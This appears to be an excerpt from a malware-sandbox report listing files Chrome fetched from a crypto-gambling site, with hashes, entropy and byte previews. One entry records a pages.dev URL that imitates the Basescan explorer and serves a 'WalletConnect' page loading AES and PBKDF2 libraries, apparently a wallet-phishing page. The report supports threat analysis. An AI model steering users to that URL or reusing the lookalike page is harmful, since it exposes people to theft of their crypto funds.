                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 1888, version 1.0
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1888
                                                                                                                                                                                                                                              Entropy (8bit):7.836135534039401
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:orvAKSSc2BFKKpbBIa0fkQuan8qBRm6Sl+ZnObDp3:sAK9KKX0fBbRSEObDl
                                                                                                                                                                                                                                              MD5:A249EFB3040019BE1F32707060CE0ACF
                                                                                                                                                                                                                                              SHA1:E128EF5B8B7AA9AFAA7E6907CF3B263EE532BF1C
                                                                                                                                                                                                                                              SHA-256:4377F3C2CFDD7A3FBE92B1D6EF4F128E90582CB9BF9A1E66CE06EB02C3B453F6
                                                                                                                                                                                                                                              SHA-512:23449120FAEE589C0C905F64C998D024E4DD59785172BACEA4B3035A1474F4923A120CF69A527637BDE79C3DB68E4764C84D67F30BD5BA617768B551DF699C88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/avertastd-mono-extrabold-BWo4zV1n.woff2
                                                                                                                                                                                                                                              Preview:wOF2.......`........................................f.6.`.T....T.v.,..6.$.T. ..5.O...Q....g.M.m......5[Ew...j.........dKv?.t....B.n.F.nq ,:....!.....*........0../..]'..w.C......O....-....&).(..~...._...0....<....tB...=.y....j2.$O.$V..b..).B..D..E<....)..."........\.H...5.A ...... dj2hA.. .....!.....me.=p...L.$O..&...I.#t...##.!..S...7y....,M=.%..x./Y./.-...8.."l..#N.z.bh..e...|.8d ...eH..!.&..........Q..[..........@.Q......LN..]...(...i0?........P...i....a........i.l.[{~.l....co..X.`:.[5GL...C!.. .q}.`.H..Z.*.P.*....*..$.P......sx.o.ov_i..77........Q{.J..P....^v....s....O..C.....v.........$L].V.9}q%..o.q..}O.....&c .bi.........>@o....<.("...1...(....C.Q.... ..F-..C..W.6x...q4.b.k.....&.....[h.8......q..5!.t=.Qtn.M.q.......!...........}...6.....dt.,6...zX.mi\..GTmcf..9....MP==..mu.....J...D.'.3....>Wd.X..o.7........{.gx.`U.X....5c{.K...V..W..UR.....M ..KB D.....4w.k......4.B.z.N.Fr~G./.7%.....cK..S..2......j........rX./..p..p.S.J..6.O.......~...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):360560
                                                                                                                                                                                                                                              Entropy (8bit):5.269424384764632
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ddLeNo5RkgVkBA6R2GbaHe9h/cwSS+/qLpoimmmAJCAJsEs860gNbEh6Bm:euBV42GGHe9h/JFdoimmmAoAqzKhem
                                                                                                                                                                                                                                              MD5:A64A06588D8B27058CEA8E9BF09DF46E
                                                                                                                                                                                                                                              SHA1:1D00BC952C049E9B7DA8E42B0C541BD7D23E588C
                                                                                                                                                                                                                                              SHA-256:03AE01731668023487A9F6F2ADB053F248EEFD67717CEFB811A31484C65B3208
                                                                                                                                                                                                                                              SHA-512:40750A08EF04E030B9BD075E3FDDE463F334D3543470AC3AFE8D46748A059676921E186FA5697EDA0548B6C67D9699DEF3B3CF8169FE506CF2A7F625D0A3E4D1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:{"code":0,"msg":null,"data":{"serverTimestemp":1727486210957,"currency":[{"currencyName":"COPFIAT","aliasCurrencyName":"COP","fullName":"Colombian Pesos","unitAmount":100,"withdrawLimitAmount":100,"minFee":100,"maxFee":100,"sort":1,"display":false,"channelName":"BCG","channelCurrencyName":"COPFIAT","precisionUnit":2,"blockExplorer":null,"status":0,"rechargeConfirmTimes":2,"online":true},{"currencyName":"APT","aliasCurrencyName":"APT","fullName":"APT","unitAmount":100000000,"withdrawLimitAmount":200000000,"minFee":1000000,"maxFee":100000000,"sort":1,"display":false,"channelName":"BCG","channelCurrencyName":"APT","precisionUnit":8,"blockExplorer":"https://tracemove.io","status":0,"rechargeConfirmTimes":2,"online":true},{"currencyName":"UAHFIAT","aliasCurrencyName":"UAH","fullName":"Ukrainian Hryvnia","unitAmount":10000,"withdrawLimitAmount":100000,"minFee":10000,"maxFee":10000000,"sort":1,"display":false,"channelName":"BCG","channelCurrencyName":"UAHFIAT","precisionUnit":2,"blockExplorer
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9655)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9656
                                                                                                                                                                                                                                              Entropy (8bit):5.282369994221266
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:2JMHuJCT5/sZf2j3rMuUHqO87f6clRocrfN7rYsHQWd1BcSO6n3D90EI:5Hu0N/s52j3YLf87ykRocrfGU1JOuGx
                                                                                                                                                                                                                                              MD5:C16E0BA4CD4C0965859AD51B75EF1896
                                                                                                                                                                                                                                              SHA1:768043097AE36F45D6177B4857532E32140F9490
                                                                                                                                                                                                                                              SHA-256:A0DE56DAAD4F3B8A07FB3E8DEE44AB5E20F29B5DCC435A62DA835BFFA6F6BF27
                                                                                                                                                                                                                                              SHA-512:D293E2FBAFA3F696C8465CDF2BCD1C375A98D2E25F083A4AC54A0290C8D6AED8FB9DDCAC52563CEBC2D6788A651FE81A96FD1049C7739AB5ACCB62DE66755344
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var Oe=Object.defineProperty;var B=Object.getOwnPropertySymbols;var Ae=Object.prototype.hasOwnProperty,Se=Object.prototype.propertyIsEnumerable;var q=(e,r,t)=>r in e?Oe(e,r,{enumerable:!0,configurable:!0,writable:!0,value:t}):e[r]=t,w=(e,r)=>{for(var t in r||(r={}))Ae.call(r,t)&&q(e,t,r[t]);if(B)for(var t of B(r))Se.call(r,t)&&q(e,t,r[t]);return e};import{L as $e}from"./manifest-51a3674f.js";import{q as je,c as G,b as R,r as we,u as P,j as Pe}from"./solid-js-38561dfe.js";import{b as Ie,r as Ce,S as D}from"./_baseGetTag-c2e287b9.js";import{m as te,i as x,l as _e,e as ne,o as xe,p as Le,k as ae,q as ie,s as Me,b as Fe,r as Ee,U as H,g as L,t as S,u as oe,c as ue,S as se,n as Ue,d as Ke,a as W,h as Ne}from"./_baseFor-3fee30d6.js";import{a as j,i as I}from"./isArray-79a0be9c.js";import{i as T,g as Be,e as M,a as qe}from"./_MapCache-1fb5cc44.js";var Q=Object.create,Ge=function(){function e(){}return function(r){if(!T(r))return{};if(Q)return Q(r);e.prototype=r;var t=new e;return e.prototype=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                                              Entropy (8bit):7.714118069239848
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:0egxI7Xo7MMIWxlYWu0uk19y1gSw8PW7u:fga7XmMMIWxKWfLawDu
                                                                                                                                                                                                                                              MD5:5054BE346A4BACBB909E7A1B5B6624AF
                                                                                                                                                                                                                                              SHA1:E5C01751C0916970D259E95C53219D75BB550756
                                                                                                                                                                                                                                              SHA-256:AEF5FA9343592B398458FD825B547FB31A8719529F2ED460ADD715D03A3910BE
                                                                                                                                                                                                                                              SHA-512:B6E25BB338C1B1E90492CF8C9384114E80ED43C64DED462866D91821E0156EE6F49C59D3D91DD5198A4EFC2CEE8A4F0EC64269B68311EC6A73A0418A5C5806E0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/apple_pay-DhGEreIw.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../w.../a.m.......A.M..q.+h.F...t....M d..........no99..>.Q..!......@.W%.>w...#..0.@8.@..(...D....K...X...y.&*...O..B.pN..i..O$..d...$...k....=.k.....$7t#?_N$..3..b...&V..i.Q^.0L.m.....!.}...i.x.....CQ^@...?, ?#...d..o.,.,...^m...........)..g.9O...?.\*......|E.{.n..d........n.........X..<.f.A.."..l..y....W..+W1...=.Z.........(....T.v...v...f.OQ9....Y...7{...2...c..+...W.gY..H..H.....Z...r;...O.....f...$%g.Z.,VUG..d.G.M-...R.....fp....".sI..In.v..qJ8.<.s.$)jTK..R...9A.....rjV...q(3hj....i..2..H2.HrCC.....&8.Ep$).H............r..L..{.^.ZQ...IF .\.t..)..P1...I^...t....>Y...I....f..D.=..Y.Or.$.........m.G....j.<.f{lc...9...s..K.;.....k.r...QEw.qA.;...z.'.Nr..v.k....Aa........H""C.2+.w.\Oh........9..}`v.N<|..tN........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1732)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1733
                                                                                                                                                                                                                                              Entropy (8bit):5.509145509234524
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:R56cYcricyQZeX714GvtxpJueJZUciyBClu:RZYu3ycer1/dDIyT
                                                                                                                                                                                                                                              MD5:F96FBEBFE59FDD6EC68F49CF8C699241
                                                                                                                                                                                                                                              SHA1:3DA570D8600212F63EFE714F202F4DDE0BDA9913
                                                                                                                                                                                                                                              SHA-256:AB93A021A0F9BAF159BF0D919FE563FE26A6946472BD880418546269E6B67054
                                                                                                                                                                                                                                              SHA-512:E19D6A93A54187A88423C60944BDFFE700186F1755FB31DA3C93810C6D364ADCDCB9A105ACE127CCBE8305A0D6AB14191CFE3B54E3CBEBB3370B99C003F8694B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/lottery-9c791aba.js
                                                                                                                                                                                                                                              Preview:var c=Object.defineProperty,d=Object.defineProperties;var l=Object.getOwnPropertyDescriptors;var e=Object.getOwnPropertySymbols;var f=Object.prototype.hasOwnProperty,m=Object.prototype.propertyIsEnumerable;var s=(a,t,r)=>t in a?c(a,t,{enumerable:!0,configurable:!0,writable:!0,value:r}):a[t]=r,n=(a,t)=>{for(var r in t||(t={}))f.call(t,r)&&s(a,r,t[r]);if(e)for(var r of e(t))m.call(t,r)&&s(a,r,t[r]);return a},o=(a,t)=>d(a,l(t));import{i as S}from"./manifest-aca455c4.js";var u=(a=>(a[a.Standard=832]="Standard",a[a.SameDrum=833]="SameDrum",a[a.AdditionalDrum=834]="AdditionalDrum",a))(u||{});function b(a){return Object.values(u).includes(a)}function w(a,t){if(t<=0||a<=0||t>a)return 1;{let r=1;for(let i=a;i>a-t;i--)r*=i;for(let i=t;i>1;i--)r/=i;return r}}function h(a){const t=a.match(/\d+/);if(t){const r=t[0];return Number(r)}else return 0}function D(a,t){return a.slice(0,t).map((i,p)=>o(n({},i),{label:i.draws===1?"1Draw":`${i.draws}Draws`,value:i.draws}))}const g={Australia:0,Austria:24,Barb
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1774
                                                                                                                                                                                                                                              Entropy (8bit):7.793532200635365
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:hsuxvlCpf+qeAiXhR/Py7P8elqwJg9yEqY2hj:hTxla+TAilPCPdEyK2hj
                                                                                                                                                                                                                                              MD5:7E58269748D8C28586AE9D8E20620EDB
                                                                                                                                                                                                                                              SHA1:1F292A80A06EC4BEA4392100BE056E847BCFE43C
                                                                                                                                                                                                                                              SHA-256:4A96549F79C8B81EEEE15A8DA25C52D9E5A1923D60BEFD5EEB2A36474C967E17
                                                                                                                                                                                                                                              SHA-512:AC38910E6DEFA65E12BBDDCBC78EAB3503958D1EC7F98B4DF90A94A9DE9F79483F3E2274115E0DB38E808101085C8278084F7D69285DFE054E553487625B3C77
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.>h.n..{..>h...........................Nu............Bk...]......Iq...........|..........v..q..Uz........h..Dm.....e.....l...c..En..O.....tRNS...3....s? .N.....~yj.*.....xr.....IDATx...i[.:....Y..qw.....d.}.U.w...?.6.......\.O3.l..9.iR.W:s~r...`3"..L.l.e2...X"yI.. u....i.l..,.Z..+....!.r...v.....3.}.h.W..NF!.h2P.......I|.0 $.....6p......F.i..........)..1`....>...#...(lIt.c.5..........r.......6r,.%...j+,.&.v!.....|.q....?.....Q.r..]/LO.v.$.4..[.}8......W..f.......D...}.kLn-...J...P!_.S.b.........l..j....W!%.7.o.L.L[.v..R._..'..4qJ.n2l.~...UH8+W. ...4LGy..G.6.5...p.2m.(...E.;......w...*uT.o./.+..@*".>.r&.....L}P-..<.T.0. ..&.T.\..b&d. sJ...1gY.0.W..2]W.^z.x..%..Jm.v.....Yp."k....%n....>...V..1..y.<..8.k-.......\.Er...L....`-..,..<.......>]z...!iX.......,..1...S...I..(.X8n..s..L.B.!0ws..I*?C.AaLm.,..o"...|.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (424), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):424
                                                                                                                                                                                                                                              Entropy (8bit):4.694439795913566
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:MekvFrWH0s0s0s0s0s0s0s0s1PAQUmPm6SfVVVVVVVVmn:MekUAQUD6Sun
                                                                                                                                                                                                                                              MD5:892FF91BE372EF79E26495CB94D7D419
                                                                                                                                                                                                                                              SHA1:3B9976EA185A70F1154B3CAE5B936A13D0C0C22C
                                                                                                                                                                                                                                              SHA-256:82BB27680FAA7C3C6F6AA1965B85114DC0842806785DDF4665947C014BC4FCB6
                                                                                                                                                                                                                                              SHA-512:AAEC9E2B8EB20B2A65EA6FDEC184CEFC7BEA12825F4226409BE2175BCF1AD8A3C4919CF580B80FEC44A62524064894589ECCF09D06C57D81B8DD6BA1B5CA0D99
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISgAEJ-oaUiPA-IdoSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIXCWWIXn0AAOPcEgUNGmmM3xIFDT0fUzwSEAlBCdISZwSuWhIFDVqx1xASJQlaBNe_WLhjZBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSTwnjpyY1BVI-LRIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8=?alt=proto
                                                                                                                                                                                                                                              Preview:CpkBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAokCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):25155
                                                                                                                                                                                                                                              Entropy (8bit):4.882389209430153
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:xy8AHxAnJsJ8AxJsros2WfPhn8Abf5EjFQ+2QGTq23gFZrfIg4w1ZnWq54MEfFzY:xywJ0yieaypHo
                                                                                                                                                                                                                                              MD5:322E59402DE7B06CC695CF55758A0F64
                                                                                                                                                                                                                                              SHA1:12FB9E23DFB62D8330C48239DACB6CB2BE7D2B83
                                                                                                                                                                                                                                              SHA-256:E0A8297FB7CE77B3949DC2979FE39B474978EE33A2BAF0C4DF8ED8761828A5C4
                                                                                                                                                                                                                                              SHA-512:553FE7C3CE7C41B31400BFF321BDAE2A553BB22DEF173955A8715BFA9C745BCB4A40F7CFC38045EE67E9BF290A2F37F56FC6FA118692DDE4CB0867F25F747785
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/cache/platform-sports/v14/live10/2103509236163162112/en/
                                                                                                                                                                                                                                              Preview:{"code":0,"msg":null,"data":{"imgDomain":"https://start9.sptpub.com","items":[{"sportInfo":{"template":0,"inside_out":false,"name":"Soccer","priority":200,"slug":"soccer"},"categoryInfo":{"sport_id":"1","country_code":"ARG","name":"Argentina","priority":44,"slug":"argentina"},"tournamentInfo":{"category_id":"1669819052169760768","name":"Liga Profesional","slug":"liga-profesional","priority":210},"matchInfo":{"id":"2448270734146023472","desc":{"virtual":false,"competitors":[{"sport_id":"1","name":"Independiente Rivadavia","id":"36842","country_code":"ARG","abbreviation":"IRM"},{"sport_id":"1","name":"Instituto AC Cordoba","id":"4937","country_code":"ARG","abbreviation":"IAC"}],"scheduled":1727481600,"bet_builder":true,"tournament":"1669819052220092416","player_props":false,"type":"match","category":"1669819052169760768","sport":"1","slug":"independiente-rivadavia-instituto-ac-cordoba","all_markets":false},"state":{"provider":"35ff91e2","match_status":7,"status":1},"score":{"extra_info":
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4868
                                                                                                                                                                                                                                              Entropy (8bit):7.912773102525396
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:RZXluMS5NGoTGVRe/BvA3N+3LbujXKqV+IV0CfF:jle5NSeZvJ/uzKjIV0a
                                                                                                                                                                                                                                              MD5:5A3CE41301FE0A3CA5291B9D6DA3F51E
                                                                                                                                                                                                                                              SHA1:8C370312034F3B023E1331220C500885022A9A63
                                                                                                                                                                                                                                              SHA-256:848A457286CD5CF962DB9379992C470842A168900D410F200BD8E39FCD33D09C
                                                                                                                                                                                                                                              SHA-512:CCED7EAF7E608DE2448FA36E6554F470ADEB8396A20CB704573F7FBBD5F06CCA17C96F8476E308CCFF93EA19A3CE5D0DEFA662F159AD0B2422582F8854A36516
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d..........$.A....sRGB.........PLTE!To~..Z..Cf}.....!Nk.Ki'Up;c{.....v.........q..7`x2]u...k....-Ys.........Sl..........-To...Jj.n..............D`w.....................h..t..}..M..U..3WpJczly.......9ZrRf|...c..w................#\t...?\t[k.ao.......(Plh...........}ct.f..M...[..........................fo....Yq.^.._..sy.[..T...........jt..........c....M....c......~w..2y............D..........s......M...........'d{..u..l,...T.....d........{..E.....r..b.....U..W.....8...W...wn...O..{~....+............s......xh...z....6....|c...n..S.....zv...`......B..+o....d......}..qj..h..z..a........M..~....{xu6..R........u..w}|r..Gu.......{..}....}...o..r...w..ts....mi.....>.....C........W..X....x..M..:o......{......Q..D..{..^.....j..k..1g.^{.^....b..q.....7..s..p.....D.........IDAThC..yXWe....@Lb#...J...C.".B..(&.)*..(....k. .e.L.(.6.a..+....L..:.$....8..\.}?.9.r..}.......~...~......o...[.o........\._...!..................._..gggg.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (460)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1897
                                                                                                                                                                                                                                              Entropy (8bit):5.15749049535416
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:sQJiG1LdS2gpAIORLPpKMLncIR6jx+o4GJLY+5ej/HzJaoGZD13cOYrdO9bS:sQb9Y2KpOlPpDwrx+e5ebEZh3cOYrdOM
                                                                                                                                                                                                                                              MD5:9B90BE693B3DC592F61DE5E429D7F68F
                                                                                                                                                                                                                                              SHA1:9F03EA95DF470F3C2A7E7F11922A4A2A9F50D941
                                                                                                                                                                                                                                              SHA-256:819CFB86F8E886296211F58849C55AF3CD04A5687D7096BB4F198458DD9813DA
                                                                                                                                                                                                                                              SHA-512:23D4377C21AD048B8F38F8AC5E23FC4D857BD63D667EFED43950F95D411A4B9229195BCA3806DEBF45B0A422A99D43C84113BC60F3E71B147C2FEA62FAD460F1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/jss/blockies.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:(function(){var randseed=new Array(4);function seedrand(seed){for(var i=0;i<randseed.length;i++){randseed[i]=0;}.for(var i=0;i<seed.length;i++){randseed[i%4]=((randseed[i%4]<<5)-randseed[i%4])+seed.charCodeAt(i);}}.function rand(){var t=randseed[0]^(randseed[0]<<11);randseed[0]=randseed[1];randseed[1]=randseed[2];randseed[2]=randseed[3];randseed[3]=(randseed[3]^(randseed[3]>>19)^t^(t>>8));return(randseed[3]>>>0)/((1<<31)>>>0);}.function createColor(){var h=Math.floor(rand()*360);var s=((rand()*60)+40)+'%';var l=((rand()+rand()+rand()+rand())*25)+'%';var color='hsl('+h+','+s+','+l+')';return color;}.function createImageData(size){var width=size;var height=size;var dataWidth=Math.ceil(width/2);var mirrorWidth=width-dataWidth;var data=[];for(var y=0;y<height;y++){var row=[];for(var x=0;x<dataWidth;x++){row[x]=Math.floor(rand()*2.3);}.var r=row.slice(0,mirrorWidth);r.reverse();row=row.concat(r);for(var i=0;i<row.length;i++){data.push(row[i]);}}.return data;}.function createCanvas(imageData
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15190)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):15191
                                                                                                                                                                                                                                              Entropy (8bit):5.2363316884480335
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:wTeveO2MfWfVfL+R+TtXKAS2OtOKRoul54b2hKnTaGTtjRe5:wTeveO2MeVDtXKASHtOKRoul5QqKTae0
                                                                                                                                                                                                                                              MD5:5F0FD0A2B08E55D03B3863FE5DB68BB3
                                                                                                                                                                                                                                              SHA1:0EE7BD7EA06E26D3F45578CE85BF1E9237C6AD93
                                                                                                                                                                                                                                              SHA-256:4996CDB1B75CE2243F98DF658C8020F5F36034EEE2EB2D43091BC3E4FA935143
                                                                                                                                                                                                                                              SHA-512:40549784BAE4AF11DF7EA603DC8B92B11229C323CE4337EBEFC8944768A5EC9BD6F16E5E87A0AEEEF3DD9F548DD157CD053BC93EB0326586CA6A8D79328A6AA0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/manifest-aca455c4.js
                                                                                                                                                                                                                                              Preview:var d=(l,_,i)=>new Promise((E,a)=>{var t=s=>{try{n(i.next(s))}catch(r){a(r)}},o=s=>{try{n(i.throw(s))}catch(r){a(r)}},n=s=>s.done?E(s.value):Promise.resolve(s.value).then(t,o);n((i=i.apply(l,_)).next())});const L="modulepreload",v=function(l){return"/modules/lottery2/"+l},m={},e=function(_,i,E){if(!i||i.length===0)return _();const a=document.getElementsByTagName("link");return Promise.all(i.map(t=>{if(t=v(t),t in m)return;m[t]=!0;const o=t.endsWith(".css"),n=o?'[rel="stylesheet"]':"";if(!!E)for(let c=a.length-1;c>=0;c--){const u=a[c];if(u.href===t&&(!o||u.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${n}`))return;const r=document.createElement("link");if(r.rel=o?"stylesheet":L,o||(r.as="script",r.crossOrigin=""),r.href=t,document.head.appendChild(r),o)return new Promise((c,u)=>{r.addEventListener("load",c),r.addEventListener("error",()=>u(new Error(`Unable to preload CSS for ${t}`)))})})).then(()=>_()).catch(t=>{const o=new Event("vite:preloadError",{canc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65470)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1184878
                                                                                                                                                                                                                                              Entropy (8bit):5.668179527600575
                                                                                                                                                                                                                                              Encrypted:false
